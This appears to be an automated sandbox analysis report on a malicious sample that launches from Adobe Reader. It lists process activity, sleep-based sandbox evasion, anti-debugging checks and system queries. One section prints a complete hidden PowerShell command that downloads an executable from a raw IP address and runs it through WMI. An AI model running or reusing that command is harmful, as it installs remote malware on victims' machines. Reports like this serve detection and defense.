Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2180Thread sleep count: 50 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2136Thread sleep time: -922337203685477s >= -60000s
Queries keyboard layoutsShow sources
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010409Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010409Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\scmwrap.exeSystem information queried: KernelDebuggerInformation
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\System32\scmwrap.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)
Source: C:\Windows\System32\scmwrap.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null) Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: AcroRd32.exe, 00000003.00000002.10732133301.01410000.00000002.sdmpBinary or memory string: Progman
Source: AcroRd32.exe, 00000003.00000002.10732133301.01410000.00000002.sdmpBinary or memory string: Program Manager
Source: AcroRd32.exe, 00000003.00000002.10732133301.01410000.00000002.sdmpBinary or memory string: Shell_TrayWnd

Language, Device and Operating System Detection:

barindex
Queries the installation date of WindowsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\scmwrap.exeQueries volume information: C:\Windows\System32\scmwrap.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
